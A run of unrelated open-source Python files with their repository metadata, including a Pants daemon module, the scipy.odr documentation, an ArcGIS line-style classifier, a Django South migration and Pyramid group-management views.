sys.stderr = _LoggerStream(logging.getLogger(), logging.WARN, result.log_stream)
self._logger.debug('logging initialized')
return result.log_stream
def _setup_services(self, services):
assert self._lock is not None, 'PantsDaemon lock has not been set!'
for service in services:
self._logger.info('setting up service {}'.format(service))
service.setup(self._lock)
def _run_services(self, services):
"""Service runner main loop."""
if not services:
self._logger.critical('no services to run, bailing!')
return
service_thread_map = {service: threading.Thread(target=service.run) for service in services}
# Start services.
for service, service_thread in service_thread_map.items():
self._logger.info('starting service {}'.format(service))
try:
service_thread.start()
except (RuntimeError, service.ServiceError):
self.shutdown(service_thread_map)
raise self.StartupFailure('service {} failed to start, shutting down!'.format(service))
# Once all services are started, write our pid.
self.write_pid()
self.write_metadata_by_name('pantsd', self.FINGERPRINT_KEY, self.options_fingerprint)
# Monitor services.
while not self.is_killed:
for service, service_thread in service_thread_map.items():
if not service_thread.is_alive():
self.shutdown(service_thread_map)
raise self.RuntimeFailure('service failure for {}, shutting down!'.format(service))
else:
# Avoid excessive CPU utilization.
service_thread.join(self.JOIN_TIMEOUT_SECONDS)
def _write_named_sockets(self, socket_map):
"""Write multiple named sockets using a socket mapping."""
for socket_name, socket_info in socket_map.items():
self.write_named_socket(socket_name, socket_info)
def run_sync(self):
"""Synchronously run pantsd."""
# Switch log output to the daemon's log stream from here forward.
log_stream = self._setup_logging(self._log_level)
self._exiter.set_except_hook(log_stream)
self._logger.info('pantsd starting, log level is {}'.format(self._log_level))
self._native.set_panic_handler()
# Set the process name in ps output to 'pantsd' vs './pants compile src/etc:: -ldebug'.
set_process_title('pantsd [{}]'.format(self._build_root))
# Write service socket information to .pids.
self._write_named_sockets(self._socket_map)
# Enter the main service runner loop.
self._setup_services(self._services)
self._run_services(self._services)
def post_fork_child(self):
"""Post-fork() child callback for ProcessManager.daemon_spawn()."""
entry_point = '{}:launch'.format(__name__)
exec_env = combined_dict(os.environ, dict(PANTS_ENTRYPOINT=entry_point))
# Pass all of sys.argv so that we can proxy arg flags e.g. `-ldebug`.
cmd = [sys.executable] + sys.argv
self._logger.debug('cmd is: PANTS_ENTRYPOINT={} {}'.format(entry_point, ' '.join(cmd)))
# TODO: Improve error handling on launch failures.
os.spawnve(os.P_NOWAIT, sys.executable, cmd, env=exec_env)
def maybe_launch(self):
"""Launches pantsd (if not already running) in a subprocess.
:returns: The port that pantsd is listening on.
:rtype: int
"""
self.watchman_launcher.maybe_launch()
self._logger.debug('acquiring lock: {}'.format(self.process_lock))
with self.process_lock:
new_fingerprint = self.options_fingerprint
self._logger.debug('pantsd: is_alive={} new_fingerprint={} current_fingerprint={}'
.format(self.is_alive(), new_fingerprint, self.fingerprint))
if self.needs_restart(new_fingerprint):
self.terminate(include_watchman=False)
self._logger.debug('launching pantsd')
self.daemon_spawn()
# Wait up to 10 seconds for pantsd to write its pidfile so we can display the pid to the user.
self.await_pid(10)
listening_port = self.read_named_socket('pailgun', int)
pantsd_pid = self.pid
self._logger.debug('released lock: {}'.format(self.process_lock))
self._logger.debug('pantsd is running at pid {}, pailgun port is {}'
.format(pantsd_pid, listening_port))
return listening_port
def terminate(self, include_watchman=True):
"""Terminates pantsd and watchman."""
super(PantsDaemon, self).terminate()
if include_watchman:
self.watchman_launcher.terminate()
def launch():
"""An external entrypoint that spawns a new pantsd instance."""
PantsDaemon.Factory.create().run_sync()
|
{
"content_hash": "d74314b1aeeeddd133baed3d7033c3d5",
"timestamp": "",
"source": "github",
"line_count": 325,
"max_line_length": 104,
"avg_line_length": 37.92307692307692,
"alnum_prop": 0.6906288032454361,
"repo_name": "fkorotkov/pants",
"id": "c97e0c444a20cd22b32305212d4a85b266430c21",
"size": "12472",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/python/pants/pantsd/pants_daemon.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "781"
},
{
"name": "CSS",
"bytes": "9444"
},
{
"name": "GAP",
"bytes": "1283"
},
{
"name": "Gherkin",
"bytes": "919"
},
{
"name": "Go",
"bytes": "1805"
},
{
"name": "HTML",
"bytes": "79866"
},
{
"name": "Java",
"bytes": "481460"
},
{
"name": "JavaScript",
"bytes": "35417"
},
{
"name": "Python",
"bytes": "5931594"
},
{
"name": "Rust",
"bytes": "271643"
},
{
"name": "Scala",
"bytes": "76239"
},
{
"name": "Shell",
"bytes": "74734"
},
{
"name": "Thrift",
"bytes": "2795"
}
],
"symlink_target": ""
}
|
from .send_recv import send_u_recv # noqa: F401
from .send_recv import send_ue_recv # noqa: F401
from .send_recv import send_uv # noqa: F401
__all__ = []
|
{
"content_hash": "0abba27474780c778b8341500060559b",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 49,
"avg_line_length": 31.6,
"alnum_prop": 0.6708860759493671,
"repo_name": "PaddlePaddle/Paddle",
"id": "c07f9bc40c6b39967ed168afb11928eb2ba1d635",
"size": "769",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "python/paddle/geometric/message_passing/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "58544"
},
{
"name": "C",
"bytes": "210300"
},
{
"name": "C++",
"bytes": "36848680"
},
{
"name": "CMake",
"bytes": "902619"
},
{
"name": "Cuda",
"bytes": "5227207"
},
{
"name": "Dockerfile",
"bytes": "4361"
},
{
"name": "Go",
"bytes": "49796"
},
{
"name": "Java",
"bytes": "16630"
},
{
"name": "Jinja",
"bytes": "23852"
},
{
"name": "MLIR",
"bytes": "39982"
},
{
"name": "Python",
"bytes": "36203874"
},
{
"name": "R",
"bytes": "1332"
},
{
"name": "Shell",
"bytes": "553177"
}
],
"symlink_target": ""
}
|
"""
=================================================
Orthogonal distance regression (:mod:`scipy.odr`)
=================================================
.. currentmodule:: scipy.odr
Package Content
===============
.. autosummary::
:toctree: generated/
Data -- The data to fit.
RealData -- Data with weights as actual std. dev.s and/or covariances.
Model -- Stores information about the function to be fit.
ODR -- Gathers all info & manages the main fitting routine.
Output -- Result from the fit.
odr -- Low-level function for ODR.
OdrWarning -- Warning about potential problems when running ODR
OdrError -- Error exception.
OdrStop -- Stop exception.
Prebuilt models:
.. autosummary::
polynomial
.. data:: exponential
.. data:: multilinear
.. data:: unilinear
.. data:: quadratic
.. data:: polynomial
Usage information
=================
Introduction
------------
Why Orthogonal Distance Regression (ODR)? Sometimes one has
measurement errors in the explanatory (a.k.a., "independent")
variable(s), not just the response (a.k.a., "dependent") variable(s).
Ordinary Least Squares (OLS) fitting procedures treat the data for
explanatory variables as fixed, i.e., not subject to error of any kind.
Furthermore, OLS procedures require that the response variables be an
explicit function of the explanatory variables; sometimes making the
equation explicit is impractical and/or introduces errors. ODR can
handle both of these cases with ease, and can even reduce to the OLS
case if that is sufficient for the problem.
ODRPACK is a FORTRAN-77 library for performing ODR with possibly
non-linear fitting functions. It uses a modified trust-region
Levenberg-Marquardt-type algorithm [1]_ to estimate the function
parameters. The fitting functions are provided by Python functions
operating on NumPy arrays. The required derivatives may be provided
by Python functions as well, or may be estimated numerically. ODRPACK
can do explicit or implicit ODR fits, or it can do OLS. Input and
output variables may be multi-dimensional. Weights can be provided to
account for different variances of the observations, and even
covariances between dimensions of the variables.
The `scipy.odr` package offers an object-oriented interface to
ODRPACK, in addition to the low-level `odr` function.
Additional background information about ODRPACK can be found in the
`ODRPACK User's Guide
<https://docs.scipy.org/doc/external/odrpack_guide.pdf>`_, reading
which is recommended.
Basic usage
-----------
1. Define the function you want to fit against.::
def f(B, x):
'''Linear function y = m*x + b'''
# B is a vector of the parameters.
# x is an array of the current x values.
# x is in the same format as the x passed to Data or RealData.
#
# Return an array in the same format as y passed to Data or RealData.
return B[0]*x + B[1]
2. Create a Model.::
linear = Model(f)
3. Create a Data or RealData instance.::
mydata = Data(x, y, wd=1./power(sx,2), we=1./power(sy,2))
or, when the actual covariances are known::
mydata = RealData(x, y, sx=sx, sy=sy)
4. Instantiate ODR with your data, model and initial parameter estimate.::
myodr = ODR(mydata, linear, beta0=[1., 2.])
5. Run the fit.::
myoutput = myodr.run()
6. Examine output.::
myoutput.pprint()
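Putting the six steps together, a minimal end-to-end sketch (assuming ``x``,
``y``, ``sx`` and ``sy`` are NumPy arrays prepared by the caller)::

    from scipy.odr import Model, ODR, RealData

    def f(B, x):
        '''Linear function y = m*x + b'''
        return B[0]*x + B[1]

    linear = Model(f)
    mydata = RealData(x, y, sx=sx, sy=sy)
    myodr = ODR(mydata, linear, beta0=[1., 2.])
    myoutput = myodr.run()
    myoutput.pprint()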
References
----------
.. [1] P. T. Boggs and J. E. Rogers, "Orthogonal Distance Regression,"
in "Statistical analysis of measurement error models and
applications: proceedings of the AMS-IMS-SIAM joint summer research
conference held June 10-16, 1989," Contemporary Mathematics,
vol. 112, pg. 186, 1990.
"""
# version: 0.7
# author: Robert Kern <robert.kern@gmail.com>
# date: 2006-09-21
from __future__ import division, print_function, absolute_import
from .odrpack import *
from .models import *
from . import add_newdocs
__all__ = [s for s in dir()
if not (s.startswith('_') or s in ('odr_stop', 'odr_error'))]
from scipy._lib._testutils import PytestTester
test = PytestTester(__name__)
del PytestTester
|
{
"content_hash": "960434f474d996abcbc81a3346fa97f7",
"timestamp": "",
"source": "github",
"line_count": 140,
"max_line_length": 80,
"avg_line_length": 30.228571428571428,
"alnum_prop": 0.6732041587901701,
"repo_name": "lhilt/scipy",
"id": "f504937eb11e5bde9a8ddfce6ce6de6d5d07e9fb",
"size": "4232",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "scipy/odr/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4396416"
},
{
"name": "C++",
"bytes": "643592"
},
{
"name": "Fortran",
"bytes": "5368331"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "12378541"
},
{
"name": "Shell",
"bytes": "538"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
}
|
import arcpy
import os
import logging
logger = logging.getLogger("style_debug")
#-------------------------------------------------------------------------------
# Calculates the style code value
def CalculateStyleCode(row):
descTerm = row[3]
descGroup = row[4]
make = row[5]
physicalPres = row[6]
returnVal = 99
if descTerm is None:
descTerm = ""
if descGroup is None:
descGroup = ""
if (descTerm == "Polygon Closing Link"):
returnVal = 1
elif (descTerm == "Inferred Property Closing Link"):
returnVal = 2
elif (descTerm == "Bottom Of Slope"):
returnVal = 3
elif (descTerm == "Top Of Slope"):
returnVal = 4
elif (descTerm == "Step"):
returnVal = 5
elif (descTerm is not None and descTerm.find("Mean High Water (Springs)") > -1):
returnVal = 6
elif (descTerm == "Traffic Calming"):
returnVal = 7
elif (descTerm == "Standard Gauge Track"):
returnVal = 8
elif (descTerm == "Bottom Of Cliff"):
returnVal = 9
elif (descTerm == "Top Of Cliff"):
returnVal = 10
elif (descTerm == "Mean Low Water (Springs)"):
returnVal = 11
elif (descTerm == "Unmade Path Alignment"):
returnVal = 12
elif (descTerm is not None and descTerm.find("Overhead Construction") > -1):
returnVal = 13
elif (descTerm == "Culvert"):
returnVal = 14
elif (descTerm == "Pylon"):
returnVal = 15
elif (descTerm == "Ridge Or Rock Line"):
returnVal = 16
elif (descTerm == "Narrow Gauge"):
returnVal = 17
elif (descTerm == "Buffer"):
returnVal = 18
elif (descTerm == "Tunnel Edge"):
returnVal = 19
elif (descTerm is not None and descTerm.find("Line Of Posts") > -1):
returnVal = 20
elif (descTerm == "Drain"):
returnVal = 21
elif (descTerm == "Normal Tidal Limit"):
returnVal = 22
# Descriptive group rules
elif (descGroup is not None and descGroup.find("General Feature") > -1 and physicalPres != "Edge / Limit"):
returnVal = 23
elif (descGroup is not None and descGroup.find("Building") > -1 and descTerm == "Outline" and physicalPres == "Obstructing"):
returnVal = 24
elif (descGroup is not None and descGroup.find("General Feature") > -1 and physicalPres == "Edge / Limit"):
returnVal = 25
elif (descGroup == "Road Or Track"):
returnVal = 26
elif (descGroup is not None and descGroup.find("Building") > -1 and descTerm == "Division" and physicalPres == "Obstructing"):
returnVal = 27
elif (descGroup == "Inland Water"):
returnVal = 28
elif (descGroup is not None and descGroup.find("General Surface") > -1 and make == "Natural"):
returnVal = 29
elif (descGroup is not None and descGroup.find("Building") > -1 and descTerm == "Outline" and physicalPres == "Overhead"):
returnVal = 30
elif (descGroup == "Landform" and make == "Natural"):
returnVal = 31
elif (descGroup == "Historic Interest"):
returnVal = 32
elif (descGroup == "Landform" and make == "Manmade"):
returnVal = 33
else:
returnVal = 99
logger.debug("Style Code:"+ str(returnVal))
return returnVal
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# Calculates the style description value
def CalculateStyleDescription(row):
descTerm = row[3]
descGroup = row[4]
make = row[5]
physicalPres = row[6]
returnVal = "Unclassified"
if descTerm is None:
descTerm = ""
if descGroup is None:
descGroup = ""
if (descTerm == "Polygon Closing Link"):
returnVal = "Polygon Closing Line"
elif (descTerm == "Inferred Property Closing Link"):
returnVal = "Property Closing Line"
elif (descTerm == "Bottom Of Slope"):
returnVal = "Bottom Of Slope Line"
elif (descTerm == "Top Of Slope"):
returnVal = "Top Of Slope Line"
elif (descTerm == "Step"):
returnVal = "Step Line"
elif (descTerm is not None and descTerm.find("Mean High Water (Springs)") > -1):
returnVal = "Mean High Water Line"
elif (descTerm == "Traffic Calming"):
returnVal = "Traffic Calming Line"
elif (descTerm == "Standard Gauge Track"):
returnVal = "Standard Gauge Track Line"
elif (descTerm == "Bottom Of Cliff"):
returnVal = "Bottom Of Cliff Line"
elif (descTerm == "Top Of Cliff"):
returnVal = "Top Of Cliff Line"
elif (descTerm == "Mean Low Water (Springs)"):
returnVal = "Mean Low Water Line"
elif (descTerm == "Unmade Path Alignment"):
returnVal = "Path Line"
elif (descTerm is not None and descTerm.find("Overhead Construction") > -1):
returnVal = "Overhead Construction Line"
elif (descTerm == "Culvert"):
returnVal = "Culvert Line"
elif (descTerm == "Pylon"):
returnVal = "Pylon Line"
elif (descTerm == "Ridge Or Rock Line"):
returnVal = "Ridge Or Rock Line"
elif (descTerm == "Narrow Gauge"):
returnVal = "Narrow Gauge Line"
elif (descTerm == "Buffer"):
returnVal = "Railway Buffer Line"
elif (descTerm == "Tunnel Edge"):
returnVal = "Tunnel Edge Line"
elif (descTerm is not None and descTerm.find("Line Of Posts") > -1):
returnVal = "Line Of Posts Line"
elif (descTerm == "Drain"):
returnVal = "Drain Line"
elif (descTerm == "Normal Tidal Limit"):
returnVal = "Normal Tidal Limit Line"
# Descriptive group rules
elif (descGroup is not None and descGroup.find("General Feature") > -1 and physicalPres != "Edge / Limit"):
returnVal = "Default Line"
elif (descGroup is not None and descGroup.find("Building") > -1 and descTerm == "Outline" and physicalPres == "Obstructing"):
returnVal = "Building Outline Line"
elif (descGroup is not None and descGroup.find("General Feature") > -1 and physicalPres == "Edge / Limit"):
returnVal = "Edge Line"
elif (descGroup == "Road Or Track"):
returnVal = "Road Or Track Line"
elif (descGroup is not None and descGroup.find("Building") > -1 and descTerm == "Division" and physicalPres == "Obstructing"):
returnVal = "Building Division Line"
elif (descGroup == "Inland Water"):
returnVal = "Inland Water Line"
elif (descGroup is not None and descGroup.find("General Surface") > -1 and make == "Natural"):
returnVal = "General Surface Natural Line"
elif (descGroup is not None and descGroup.find("Building") > -1 and descTerm == "Outline" and physicalPres == "Overhead"):
returnVal = "Building Overhead Line"
elif (descGroup == "Landform" and make == "Natural"):
returnVal = "Landform Natural Line"
elif (descGroup == "Historic Interest"):
returnVal = "Historic Interest Line"
elif (descGroup == "Landform" and make == "Manmade"):
returnVal = "Landform Manmade Line"
else:
returnVal = "Unclassified"
logger.debug("Style Description:"+ returnVal)
return returnVal;
#-------------------------------------------------------------------------------
|
{
"content_hash": "332bf967a09ff6f12c7569be7ed08bf8",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 130,
"avg_line_length": 37.72680412371134,
"alnum_prop": 0.5879218472468917,
"repo_name": "AstunTechnology/Loader",
"id": "01ee95f163130325730425ff312fc6151cdefbfe",
"size": "7676",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "python/osmm_topo_style/line_style.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "7046"
},
{
"name": "PLpgSQL",
"bytes": "2732"
},
{
"name": "Python",
"bytes": "80515"
}
],
"symlink_target": ""
}
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Build.state'
db.add_column('builds_build', 'state',
self.gf('django.db.models.fields.CharField')(default='finished', max_length=55),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Build.state'
db.delete_column('builds_build', 'state')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'builds.build': {
'Meta': {'ordering': "['-date']", 'object_name': 'Build'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'error': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'output': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'builds'", 'to': "orm['projects.Project']"}),
'setup': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'setup_error': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'finished'", 'max_length': '55'}),
'success': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'version': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'builds'", 'null': 'True', 'to': "orm['builds.Version']"})
},
'builds.version': {
'Meta': {'ordering': "['-verbose_name']", 'unique_together': "[('project', 'slug')]", 'object_name': 'Version'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'built': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'versions'", 'to': "orm['projects.Project']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'uploaded': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'builds.versionalias': {
'Meta': {'object_name': 'VersionAlias'},
'from_slug': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'largest': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'aliases'", 'to': "orm['projects.Project']"}),
'to_slug': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'projects.project': {
'Meta': {'ordering': "('slug',)", 'object_name': 'Project'},
'analytics_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'copyright': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'crate_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'default_branch': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'default_version': ('django.db.models.fields.CharField', [], {'default': "'latest'", 'max_length': '255'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'django_packages_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'documentation_type': ('django.db.models.fields.CharField', [], {'default': "'sphinx'", 'max_length': '20'}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'project_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'related_projects': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['projects.Project']", 'null': 'True', 'through': "orm['projects.ProjectRelationship']", 'blank': 'True'}),
'repo': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'repo_type': ('django.db.models.fields.CharField', [], {'default': "'git'", 'max_length': '10'}),
'requirements_file': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'skip': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "'.rst'", 'max_length': '10'}),
'theme': ('django.db.models.fields.CharField', [], {'default': "'default'", 'max_length': '20'}),
'use_virtualenv': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'projects'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
'projects.projectrelationship': {
'Meta': {'object_name': 'ProjectRelationship'},
'child': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'superprojects'", 'to': "orm['projects.Project']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subprojects'", 'to': "orm['projects.Project']"})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['builds']
|
{
"content_hash": "30972241f13769161d48eee00c082602",
"timestamp": "",
"source": "github",
"line_count": 138,
"max_line_length": 230,
"avg_line_length": 79.08695652173913,
"alnum_prop": 0.5488363569726956,
"repo_name": "sils1297/readthedocs.org",
"id": "6b9dfeea59d6cceffba2e7ba84882b350cbae20d",
"size": "10938",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "readthedocs/builds/migrations/0013_add_state_field.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "4515"
},
{
"name": "CSS",
"bytes": "65340"
},
{
"name": "HTML",
"bytes": "213352"
},
{
"name": "JavaScript",
"bytes": "1437939"
},
{
"name": "Makefile",
"bytes": "4594"
},
{
"name": "Python",
"bytes": "1459496"
},
{
"name": "Shell",
"bytes": "492"
}
],
"symlink_target": ""
}
|
from pyramid.view import view_config
from pyramid import httpexceptions as exception
from ..juliette.modelGroup import Grupo
from ..juliette.excepciones import DatosException, ConflictoException
from ..schemas.grupos import EsquemaGrupo
import logging
log = logging.getLogger(__name__)
@view_config(route_name="grupos_creacion", renderer='json', permission='creacion')
def grupos_creacion(peticion):
    # Validate the received data
try:
v = EsquemaGrupo('cn')
contenido = v.validacion(peticion.json_body['corpus'])
except KeyError as e:
log.warning(e)
return exception.HTTPBadRequest(e)
except ValueError as e:
log.warning(e)
return exception.HTTPBadRequest(e)
except TypeError as e:
        # Raised when the request body is not correctly formatted JSON
log.warning(e)
return exception.HTTPBadRequest(e)
except DatosException as e:
log.warning(e)
return exception.HTTPBadRequest(e)
    # Perform the group creation through the library
try:
grupo = Grupo()
cn_grupo = contenido['cn'].encode('ascii')
contenido = grupo.crear(cn_grupo, contenido)
except ConflictoException as e:
        # If the group already exists, return 409 Conflict
log.warning(e)
return exception.HTTPConflict(e)
except DatosException as e:
log.warning('key error')
log.warning(e)
return exception.HTTPBadRequest(e)
    # The following appears to be THE way to respond in this case
    # TODO: however, the response here is empty when it is called with an empty, newly created Request
peticion.response.status_code = 201
peticion.response.headerlist.extend(
(
('Location', "grupos/%s" % str(cn_grupo)),
)
)
return {'mensaje': contenido}
@view_config(route_name='grupos_listado', renderer='json', permission='listar')
def grupos_listado(peticion):
try:
grupo = Grupo()
contenido = grupo.obtener()
except Exception as e:
log.error(e)
return exception.HTTPInternalServerError()
    print(contenido)
return contenido
@view_config(route_name='grupos_listado_options', renderer='json')
def grupos_listado_options(peticion):
pass
@view_config(route_name='grupos_detalle', renderer='json')
def grupos_detalle(peticion):
try:
uid = peticion.matchdict['grupo']
except KeyError as e:
return exception.HTTPBadRequest()
    # Fetch the group detail through the library
try:
grupo = Grupo()
contenido = grupo.obtener(uid)
except DatosException as e:
return exception.HTTPNotFound()
except Exception as e:
log.error(e)
return exception.HTTPInternalServerError()
return {'mensaje': contenido}
@view_config(route_name='grupos_borrado', renderer='json', permission='borrado')
def grupos_borrado(peticion):
    # Validate the received data
try:
v = EsquemaGrupo()
cn_grupo = peticion.matchdict['grupo']
except KeyError as e:
log.warning(e)
return exception.HTTPBadRequest(e)
except TypeError as e:
        # Raised when the request body is not correctly formatted JSON
log.warning(e)
return exception.HTTPBadRequest(e)
except DatosException as e:
log.warning(e)
return exception.HTTPBadRequest(e)
    # Perform the group deletion through the library
try:
grupo = Grupo()
contenido = grupo.borrar(cn_grupo)
except ConflictoException as e:
        # In this case the conflict means the group does not exist
log.warning(e)
return exception.HTTPNotFound(e)
except DatosException as e:
log.warning(e)
return exception.HTTPBadRequest(e)
except Exception as e:
log.error(e)
return exception.HTTPInternalServerError(e)
return {'mensaje': contenido}
|
{
"content_hash": "ade2a3ff7f8143e5667fc0b66c867d2b",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 104,
"avg_line_length": 31.984126984126984,
"alnum_prop": 0.6669975186104219,
"repo_name": "VTacius/justine",
"id": "f259fc7ceea2e9f4dfcd973c0c99d94665ab5d04",
"size": "4053",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "justine/views/grupos.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "77124"
}
],
"symlink_target": ""
}
|
from .cube import HoloCube # noqa (API import)
from .geo import (GeoElement, GeoFeature, GeoTiles, # noqa (API import)
WMTS, Points, Image, Text, Contours)
|
{
"content_hash": "250bb405173a91c454c382ef3129cf9e",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 75,
"avg_line_length": 69,
"alnum_prop": 0.5603864734299517,
"repo_name": "ContinuumIO/cube-explorer",
"id": "da5bbb4e4cbfe6c8f3d7c2f591fa3a3ef2f5619b",
"size": "207",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "holocube/element/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Jupyter Notebook",
